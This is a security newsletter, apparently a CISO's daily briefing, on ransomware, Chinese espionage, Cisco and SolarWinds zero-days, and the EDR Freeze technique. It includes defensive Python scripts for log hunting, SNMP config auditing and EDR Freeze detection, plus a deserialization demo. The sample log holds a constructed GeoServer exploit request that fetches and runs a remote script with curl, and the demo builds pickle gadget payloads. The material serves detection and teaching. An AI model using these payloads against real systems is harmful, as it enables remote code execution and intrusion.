Good Morning Security Gang!
After taking a short pause earlier this week for Rosh Hashanah, I’m back with a strong lineup of cyber stories that highlight everything from ransomware arrests to espionage, supply chain attacks, and even a $400M fraud crackdown. Today we’re covering the arrest of a suspect in the Europe airport ransomware case, a massive telecom threat dismantled during the UN General Assembly, Jaguar Land Rover’s extended shutdown, new Chinese malware operations, casino and gaming breaches, major vendor zero-days, GitHub’s NPM security overhaul, and more.
Espresso in hand - let’s get into it.
✈ Europe Airport Ransomware Suspect Arrested
We now know more about the attack that disrupted check-in and boarding at London Heathrow, Brussels and Berlin Brandenburg airports earlier this month. The culprit: the HardBit ransomware gang. A 40-year-old man in West Sussex has been arrested in connection with the incident and later released on bail. Collins Aerospace, the supplier whose check-in software was hit, struggled to contain reinfections, a reminder of how persistent HardBit variants are once they have a foothold. While disruptive rather than destructive, this incident underscores how ransomware-as-a-service programs let even low-level actors create national-level disruption.
📡 UN Telecom Threat Dismantled During Assembly
As 150 world leaders gathered in Manhattan, the U.S. Secret Service uncovered and dismantled a massive hidden network of SIM servers within 35 miles of the UN. With over 100,000 SIM cards active, the system could have crippled cell service, jammed 911 calls, or flooded networks with millions of texts per minute. Investigators believe it was nation-state backed, with the infrastructure alone costing millions.
As I said on the show, “It’s a new frontier of risk—attacks aimed at the invisible infrastructure that keeps cities running.”
🚗 JLR Extends Shutdown Again
Jaguar Land Rover has extended its production shutdown into next month. The company is losing £50–70M per day ($67–94M), with ripple effects across the roughly 180,000 jobs that depend on it and its suppliers. Shares of key partners have already dropped 55%.
“This isn’t just a cyber event—it’s an industrial shockwave crippling national economies.” James Azar
A senior UK politician described it as a “cyber shockwave” ripping through industrial heartlands. By the time operations resume, total losses could run into the billions, making this one of the clearest case studies yet of how ransomware creates macroeconomic impact.
🐉 China’s BrickStorm and Red November Campaigns
Researchers at Google Threat Intelligence Group (GTIG) together with Mandiant, and at Recorded Future’s Insikt Group, revealed two major Chinese espionage campaigns:
BrickStorm: Suspected Chinese hackers have been using the BrickStorm malware in long-term espionage operations against U.S. organizations in the technology and legal sectors. BrickStorm is a Go-based backdoor that sat undetected in victim environments for an average of 393 days before discovery. It doubles as a web server, file manipulation tool, dropper, SOCKS relay, and shell command executor. The attackers used it to silently siphon data from victim networks, targeting legal and technology-sector SaaS providers and business process outsourcers. Google notes that compromising such entities could help the actor develop zero-day exploits and pivot to downstream victims, especially those not protected by EDR. The sophistication coming from China continues to astound: they deploy these tools on appliances that cannot run EDR and masquerade their command-and-control as legitimate traffic to Cloudflare or Heroku.
Red November (Storm-2077): A suspected Chinese state-sponsored threat actor tracked as Red November (Microsoft’s Storm-2077) has been targeting the perimeter appliances of high-profile organizations worldwide between June 2024 and July 2025. The group used the Go-based Pantegana backdoor and Cobalt Strike in its intrusions, hitting a ministry of foreign affairs in Central Asia, a state security organization in Africa, a European government directorate, a Southeast Asian government, at least two U.S. defense contractors, a European engine manufacturer, and a trade-focused intergovernmental body in Southeast Asia. This feeds directly into our patching schedules for perimeter devices: our SLAs need to keep pace with the threat actors, and our businesses need to accept that these vulnerabilities will be exploited, at scale, soon after they become public.
🎰 Boyd Gaming Breach
Las Vegas-based Boyd Gaming disclosed a breach impacting employee and limited customer data. No operations were interrupted, meaning financial fallout will likely be absorbed by cyber insurance. Still, it highlights the continued risk in hospitality and gaming sectors already targeted by groups like Scattered Spider.
🏛 CISA Warns on GeoServer Exploits
CISA reported that threat actors (the China Chopper tooling points toward Chinese operators) exploited a GeoServer vulnerability against a federal civilian agency, deploying China Chopper web shells and using a Dirty COW (CVE-2016-5195) exploit to escalate privileges and persist. The flaw was in the KEV catalog, yet exploitation began just 10 days after disclosure, before the agency had patched: proof once again that a KEV listing only helps if patch speed follows.
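The triage step a practitioner wants after an advisory like this is a quick hunt through the web logs you already have. The Python script below is an added example (not from CISA’s advisory or from this post): it scans Apache-style access logs for the request shape of the 2024 GeoServer/GeoTools XPath-evaluation RCE (CVE-2024-36401, which I take to be the GeoServer bug the advisory refers to) and for POSTs to unexpected .jsp files, the shape a China Chopper-style web shell takes on a Java stack. The log lines, IP addresses and the web-shell path /geoserver/images/cache.jsp are constructed for the demo.

```python
"""Hunt Apache-style access logs for GeoServer XPath-RCE attempts and web-shell POSTs."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines (combined log format); addresses and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2024:09:14:02 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetFeature&typeNames=topp:states&count=5 HTTP/1.1" 200 4821 "-" "QGIS/3.34"
203.0.113.9 - - [11/Jul/2024:09:15:40 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl%20http://203.0.113.9/x.sh|sh') HTTP/1.1" 400 312 "-" "python-requests/2.31"
203.0.113.9 - - [11/Jul/2024:09:16:01 +0000] "POST /geoserver/wps HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [11/Jul/2024:09:20:33 +0000] "POST /geoserver/images/cache.jsp HTTP/1.1" 200 58 "-" "Mozilla/5.0"
10.0.0.7 - - [11/Jul/2024:09:21:10 +0000] "GET /geoserver/web/ HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Java sinks the XPath engine could be coerced into calling (matched case-insensitively).
RCE_MARKERS = ("java.lang.runtime", "getruntime(", "java.lang.processbuilder")
# Request parameters whose values reached the XPath evaluator in vulnerable GeoTools.
XPATH_PARAMS = ("valuereference", "propertyname", "xpath", "filter", "cql_filter")


def parse_line(line: str):
    """Split one combined-format line into fields; query string is URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    path, _, query = ev["target"].partition("?")
    ev["path"] = path.lower()
    ev["query"] = unquote_plus(query).lower()   # decode %20 etc. before matching
    ev["status"] = int(ev["status"])
    return ev


def classify(ev: dict):
    """Return a rule name for suspicious GeoServer requests, else None."""
    if not ev["path"].startswith("/geoserver/"):
        return None
    if any(marker in ev["query"] for marker in RCE_MARKERS):
        param = next((p for p in XPATH_PARAMS if p + "=" in ev["query"]), "unknown-param")
        # A 4xx/5xx here is NOT proof of failure: the expression is evaluated
        # before the error response is built, so the command may already have run.
        return f"geoserver-xpath-rce-attempt:{param}"
    if ev["method"] == "POST" and ev["path"].endswith(".jsp"):
        # China Chopper-style shells are tiny JSP files driven by POST bodies.
        return "possible-webshell-post"
    return None


def hunt(log_text: str):
    """Run every line through the rules; WPS POST bodies are not visible in
    access logs, so exploitation via /geoserver/wps needs WAF or body logging."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        rule = classify(ev)
        if rule:
            findings.append({"ip": ev["ip"], "ts": ev["ts"], "rule": rule,
                             "path": ev["path"], "status": ev["status"]})
    return findings


def suspicious_ips(findings):
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['rule']} {f['path']} status={f['status']}")
    print("pivot on:", suspicious_ips(hunt(SAMPLE_LOG)))
```

Feed it your real logs with `hunt(open(path).read())`, then pivot on the returned IPs: the same source hitting the WFS endpoint with a `java.lang.Runtime` expression and minutes later POSTing to a fresh .jsp is the sequence the advisory describes.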
🔐 Cisco & SolarWinds Zero-Days
Cisco IOS/IOS XE SNMP bug (CVE-2025-20352): Cisco released security updates for a high-severity zero-day in IOS and IOS XE software that is being exploited in the wild. CVE-2025-20352 is a stack-based buffer overflow in the SNMP subsystem that affects every device with SNMP enabled, across SNMPv1, v2c and v3. A remote attacker with only low privileges (a valid read-only community string or SNMPv3 credentials) can crash and reload the device; an attacker who also holds administrative (privilege 15) credentials can execute arbitrary code (as root on IOS XE) and take complete control. This is exactly the kind of perimeter vulnerability the Chinese campaigns above go after. A patch is available; apply it as soon as possible, and until then restrict SNMP access to trusted management addresses.
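Cisco’s advisory recommends limiting SNMP access to trusted hosts while you patch, and the quickest way to see where you stand is to read the config. The Python script below is an added example (not Cisco tooling and not from this post) that audits a saved `show running-config` excerpt: it reports whether the SNMP agent is configured at all, v1/v2c community strings (the low-privilege precondition), read-write and well-known communities, communities with no ACL, and SNMPv3 groups below authPriv. The config excerpt, ACL name and group names are constructed; the parser handles the common `snmp-server community|group|host` forms and should be extended for anything else your estate uses.

```python
"""Audit a Cisco IOS / IOS XE running-config for SNMP exposure."""
import re

# Constructed 'show running-config' excerpt for the demo; not from a real device.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
ip access-list standard SNMP-MGMT
 permit 10.20.30.0 0.0.0.255
!
snmp-server community public RO
snmp-server community netops-rw RW
snmp-server community mon-ro RO SNMP-MGMT
snmp-server group NMS-V3 v3 priv
snmp-server group LEGACY-V3 v3 noauth
snmp-server host 10.20.30.5 version 2c public
!
"""

COMMUNITY_RE = re.compile(r"^snmp-server community (\S+)(.*)$")
GROUP_RE = re.compile(r"^snmp-server group (\S+) v3 (noauth|auth|priv)\b")
HOST_RE = re.compile(r"^snmp-server host (\S+)(?: vrf \S+)?(?: (?:informs|traps))? version (1|2c|3)\b")
WELL_KNOWN = {"public", "private", "cisco", "admin"}


def parse_community(tail: str):
    """Return (access, acl) from the tokens after the community string.
    IOS syntax: [view NAME] [ro|rw] [ipv6 NACL] [ACL]; access defaults to RO."""
    tokens = tail.split()
    access, acl, i = "RO", None, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.lower() in ("view", "ipv6"):
            i += 2          # skip the keyword and its argument
            continue
        if tok.upper() in ("RO", "RW"):
            access = tok.upper()
        else:
            acl = tok       # standard/extended ACL number or name
        i += 1
    return access, acl


def audit(config_text: str) -> dict:
    """Walk the config and collect (severity, message) findings."""
    findings = []
    snmp_enabled = False   # note: other snmp-server commands also start the agent; extend as needed
    for raw in config_text.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            snmp_enabled = True
            name = m.group(1)
            access, acl = parse_community(m.group(2))
            findings.append(("medium", f"community '{name}' enables SNMPv1/v2c; a valid "
                                       "community string is all the low-privilege (crash) path needs"))
            if name.lower() in WELL_KNOWN:
                findings.append(("high", f"community '{name}' is a well-known default"))
            if access == "RW":
                findings.append(("high", f"community '{name}' is read-write"))
            if acl is None:
                findings.append(("high", f"community '{name}' has no ACL and is reachable from any source"))
            continue
        m = GROUP_RE.match(line)
        if m:
            snmp_enabled = True
            if m.group(2) != "priv":
                findings.append(("medium", f"SNMPv3 group '{m.group(1)}' is '{m.group(2)}'; require priv (authPriv)"))
            continue
        m = HOST_RE.match(line)
        if m and m.group(2) != "3":
            findings.append(("low", f"trap receiver {m.group(1)} uses SNMPv{m.group(2)}; "
                                    "the community string crosses the wire in cleartext"))
    return {"snmp_enabled": snmp_enabled, "findings": findings}


def summary(config_text: str) -> dict:
    """Counts per severity plus whether the device is in scope for the SNMP bug at all."""
    result = audit(config_text)
    counts = {"high": 0, "medium": 0, "low": 0}
    for sev, _ in result["findings"]:
        counts[sev] += 1
    return {"snmp_enabled": result["snmp_enabled"], **counts}


if __name__ == "__main__":
    for sev, msg in audit(SAMPLE_CONFIG)["findings"]:
        print(f"[{sev:6s}] {msg}")
    print(summary(SAMPLE_CONFIG))
```

A device with `snmp_enabled` False is out of scope for this bug; everything else goes to the front of the patch queue, with the `high` findings (default or ACL-less communities) fixed the same day by adding an ACL or removing the community outright.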
SolarWinds Web Help Desk RCE: SolarWinds has shipped yet another hotfix for a remote code execution vulnerability in Web Help Desk, the third attempt at closing the same hole. CVE-2025-26399 (CVSS 9.8) is an unauthenticated AjaxProxy deserialization flaw that allows command execution on the host. It is a patch bypass of CVE-2024-28988, which was itself a bypass of CVE-2024-28986, the original bug that was exploitable without authentication and was flagged as exploited within days of SolarWinds releasing the first hotfix in August 2024. Hopefully the third time’s a charm for our friends at SolarWinds, but the pattern shows how hard it is to properly fix complex deserialization vulnerabilities: denying the one gadget chain you saw in the wild leaves every other gadget reachable.
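Web Help Desk is Java and the sink is ObjectInputStream; the example below is an added illustration in Python (not SolarWinds’ code, not from this post) that uses pickle’s `find_class` hook as the stand-in for a Java `ObjectInputFilter`. It walks the same cycle the three CVEs describe: a first hotfix that denies the one gadget in the public exploit, a second that adds the gadget the bypass used, and finally an allowlist that only resolves the types the endpoint needs. The payloads and the legitimate OrderedDict record are constructed for the demo and only execute harmless code (reading our own PID, setting an environment variable).

```python
"""Blocklist deserialization fixes vs an allowlist, using pickle as a stand-in for Java ObjectInputStream."""
import collections
import io
import pickle


def build_payload(module: str, name: str, arg: str) -> bytes:
    """Hand-craft a protocol-0 pickle equivalent to: module.name(arg).

    Opcodes: c = GLOBAL (import module.name), ( = MARK, V = unicode string,
    t = TUPLE (collect args), R = REDUCE (call), . = STOP.
    """
    return (b"c" + module.encode() + b"\n" + name.encode() + b"\n"
            + b"(V" + arg.encode() + b"\ntR.")


# Constructed attacker payloads. GADGET_V1 is refused by every unpickler below, so the
# shell command never runs; the others execute only harmless code so that "executed"
# is observable without side effects on the host.
GADGET_V1 = build_payload("os", "system", "id")
GADGET_V2 = build_payload("builtins", "eval", "__import__('os').getpid()")
GADGET_V3 = build_payload("builtins", "exec", "import os; os.environ['DESER_DEMO'] = 'executed'")

# Legitimate data a real endpoint might accept: an OrderedDict of ticket fields.
LEGIT = pickle.dumps(collections.OrderedDict(ticket=42, state="open"))


class Fix1(pickle.Unpickler):
    """First hotfix: deny exactly the gadget used in the public exploit."""
    DENIED = {("os", "system")}

    def find_class(self, module, name):
        if (module, name) in self.DENIED:
            raise pickle.UnpicklingError(f"denied {module}.{name}")
        return super().find_class(module, name)


class Fix2(Fix1):
    """Second hotfix: extend the blocklist with the callable the bypass used."""
    DENIED = Fix1.DENIED | {("builtins", "eval"), ("subprocess", "Popen")}


class Allowlist(pickle.Unpickler):
    """Structural fix: resolve only the classes the endpoint actually needs."""
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"not allowed: {module}.{name}")
        return super().find_class(module, name)


def loads_with(unpickler_cls, data: bytes):
    return unpickler_cls(io.BytesIO(data)).load()


def outcome(unpickler_cls, data: bytes) -> str:
    """'blocked' if find_class refused the import, 'executed' if the gadget ran."""
    try:
        loads_with(unpickler_cls, data)
    except pickle.UnpicklingError:
        return "blocked"
    return "executed"


def run_matrix() -> dict:
    """Outcome of each fix generation against each payload generation."""
    payloads = {"v1": GADGET_V1, "v2": GADGET_V2, "v3": GADGET_V3}
    fixes = {"fix1": Fix1, "fix2": Fix2, "allowlist": Allowlist}
    return {fix: {tag: outcome(cls, data) for tag, data in payloads.items()}
            for fix, cls in fixes.items()}


if __name__ == "__main__":
    for fix, row in run_matrix().items():
        print(f"{fix:10s} {row}")
    print("allowlist still loads legit data:", dict(loads_with(Allowlist, LEGIT)))
```

Each blocklist generation stops only the payload that prompted it, which is the CVE-2024-28986 to CVE-2024-28988 to CVE-2025-26399 story in miniature; the allowlist rejects all three while still loading the legitimate record. In Java the equivalent is a pattern-based `ObjectInputFilter` that allows only the expected classes and rejects everything else, rather than a growing list of known gadget classes.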
📦 GitHub Strengthens NPM Security
Following the Shai-Hulud worm that compromised 500+ npm packages, GitHub is rolling out stronger controls for the registry:
MFA-enforced publishing
Short-lived granular tokens
Trusted publishing from CI/CD via OpenID Connect (OIDC), so no long-lived token sits in the pipeline
Automatic provenance attestations
This marks a fundamental shift toward supply chain security baked into developer workflows.
❄ EDR Freeze PoC
Researchers published EDR Freeze, a proof of concept that abuses WerFaultSecure.exe, a protected-process (PPL) component of Windows Error Reporting, to call MiniDumpWriteDump against an antivirus or EDR process. The dump call suspends the target’s threads, and by freezing WerFaultSecure itself mid-dump the target stays suspended indefinitely, with no vulnerable driver required. While still a PoC, attackers are watching closely, and CISOs need to track it.
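The detection hook is that WerFaultSecure.exe is handed the PID of the process it will dump on its command line, so a launch whose target is a security product, or whose parent is not the Windows Error Reporting service, stands out. The Python below is an added example (not from the EDR Freeze researchers or this post) that runs that logic over Sysmon Event ID 1 style process-creation events. Assumptions to verify against your own telemetry: the `/pid` argument as shown in the published PoC’s invocation, the starter list of security-product image names, and the set of parents considered normal for WerFaultSecure, which you should baseline. The events, PIDs and paths are constructed.

```python
"""Flag WerFaultSecure.exe launches that look like the EDR Freeze technique."""
import json
import re

# Constructed process-creation events (Sysmon Event ID 1 style, one JSON object per line).
SAMPLE_EVENTS = r"""
{"EventId": 1, "ProcessId": 1234, "Image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "MsMpEng.exe"}
{"EventId": 1, "ProcessId": 4321, "Image": "C:\\Program Files\\Contoso\\app.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "app.exe"}
{"EventId": 1, "ProcessId": 5555, "Image": "C:\\Windows\\System32\\WerFaultSecure.exe", "ParentImage": "C:\\Users\\alice\\Downloads\\freeze.exe", "CommandLine": "WerFaultSecure.exe /h /pid 1234 /tid 1300 /file 500 /encfile 504 /cancel 508"}
{"EventId": 1, "ProcessId": 6000, "Image": "C:\\Windows\\System32\\WerFaultSecure.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "WerFaultSecure.exe /h /pid 4321 /tid 4400 /file 600 /encfile 604 /cancel 608"}
{"EventId": 1, "ProcessId": 6100, "Image": "C:\\Windows\\System32\\WerFaultSecure.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "WerFaultSecure.exe /h /pid 9999 /tid 9990 /file 700 /encfile 704 /cancel 708"}
"""

# Starter list of AV/EDR service images (Defender AV, Defender for Endpoint, CrowdStrike,
# SentinelOne, Carbon Black); tune to what is deployed in your estate.
SECURITY_IMAGES = {"msmpeng.exe", "mssense.exe", "csfalconservice.exe", "sentinelagent.exe", "cb.exe"}
# Assumption: parents seen for legitimate WER crash handling. Baseline before relying on it.
EXPECTED_PARENTS = {"svchost.exe", "wermgr.exe", "werfault.exe"}
PID_ARG = re.compile(r"(?:^|\s)/pid\s+(\d+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(event_text: str) -> list:
    """Return alerts for WerFaultSecure launches whose dump target is a security
    product and/or whose parent is not a normal WER component."""
    pid_to_image = {}   # built from earlier process-creation events in the stream
    alerts = []
    for line in event_text.strip().splitlines():
        ev = json.loads(line)
        if ev.get("EventId") != 1:
            continue
        image = basename(ev["Image"])
        pid_to_image[ev["ProcessId"]] = image
        if image != "werfaultsecure.exe":
            continue
        reasons = []
        m = PID_ARG.search(ev.get("CommandLine", ""))
        target_pid = int(m.group(1)) if m else None
        target_image = pid_to_image.get(target_pid)
        if target_image in SECURITY_IMAGES:
            reasons.append(f"dump target pid {target_pid} is {target_image}")
        parent = basename(ev["ParentImage"])
        if parent not in EXPECTED_PARENTS:
            reasons.append(f"unexpected parent {parent}")
        if reasons:
            alerts.append({"pid": ev["ProcessId"], "target_pid": target_pid,
                           "severity": "high" if len(reasons) == 2 else "medium",
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["pid"], "->", a["target_pid"], "; ".join(a["reasons"]))
```

The PoC also leaves WerFaultSecure itself suspended so the target never resumes, so a complementary rule is a WerFaultSecure.exe process that targeted a security product and has not produced a process-termination event within a normal crash-dump window; that needs Event ID 5 (or equivalent) joined to the alerts above.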
🌍 Interpol $400M Fraud Crackdown
Interpol’s summer crackdown (Operation HAECHI) froze 68,000 bank accounts and 400 crypto wallets, recovering $439M across 40+ countries. Scams ranged from romance fraud to BEC to gambling-linked laundering. Portugal alone arrested 45 suspects tied to a syndicate. It’s proof that coordinated global law enforcement can hit criminals where it hurts—their wallets.
🧠 James Azar’s CISO Take
The stories today show that cyber has officially crossed into the realm of economic and national security. From JLR’s billions in losses to airports frozen by ransomware to telecom networks threatening to cripple Manhattan, we’re living in an era where governance, resilience, and supply chain security aren’t optional—they’re survival. If you’re a CISO, you can’t frame risk in just CVEs anymore; it’s about GDP, exports, and national stability.
The second takeaway is that China and others are targeting the edges of our systems—the devices and integrations we often overlook. At the same time, our defenses are still lagging (see GeoServer, Cisco, SolarWinds). The good news? Initiatives like GitHub’s NPM overhaul and global police crackdowns prove defenders are adapting. But the window between patch and exploit is shrinking to days. The question is whether we can keep pace.
✅ Action Items
✈ Review airport-style resiliency—manual backups matter.
🚗 Treat ransomware scenarios as macroeconomic risk—segment IT/OT.
📡 Harden telecom and IoT infrastructure against mass SIM abuse.
🐉 Prioritize edge device patching—track Chinese campaigns.
🔐 Patch the Cisco IOS/IOS XE SNMP bug and the SolarWinds Web Help Desk RCE immediately.
📦 Audit CI/CD and npm publishing; adopt GitHub’s trusted workflows.
❄ Track EDR Freeze PoC and validate SOC detection rules.
🌍 Leverage global law enforcement intel from Interpol operations.
That’s it for our show this morning. We’ll be back Monday at 9 AM Eastern. This Saturday I’m dropping another article. Until then, have a great rest of your day, y’all, and most importantly, stay cyber safe!